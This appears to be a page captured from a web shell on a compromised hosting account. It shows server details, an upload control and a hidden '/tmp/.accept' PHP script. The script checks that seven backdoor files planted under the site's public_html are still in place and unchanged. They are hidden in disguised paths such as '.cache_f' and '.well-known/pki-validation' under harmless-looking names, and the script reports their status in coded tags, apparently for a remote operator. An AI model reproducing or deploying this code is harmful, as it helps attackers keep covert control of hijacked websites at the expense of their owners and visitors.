HEX
Server: LiteSpeed
System: Linux premium148.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: burhbrzf (1357)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //tmp/.accept
<?php   $r = '/home/burhbrzf/public_html'; $x = ["/.cache_f/quiz_analysis.php"=>"bd@@423692@@697",
"/function.sitemap.php"=>"bd@@423734@@989",
"/.cache_f/formradio.php"=>"bd@@415150@@704",
"/.well-known/pki-validation/news_randomnews.php"=>"bd@@426702@@699",
"/HTMLDefinition.php"=>"bd@@415226@@624",
"/.well-known/titulos1.php"=>"bd@@426749@@686",
"/.cache_f/include.php"=>"bd@@412974@@6428"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');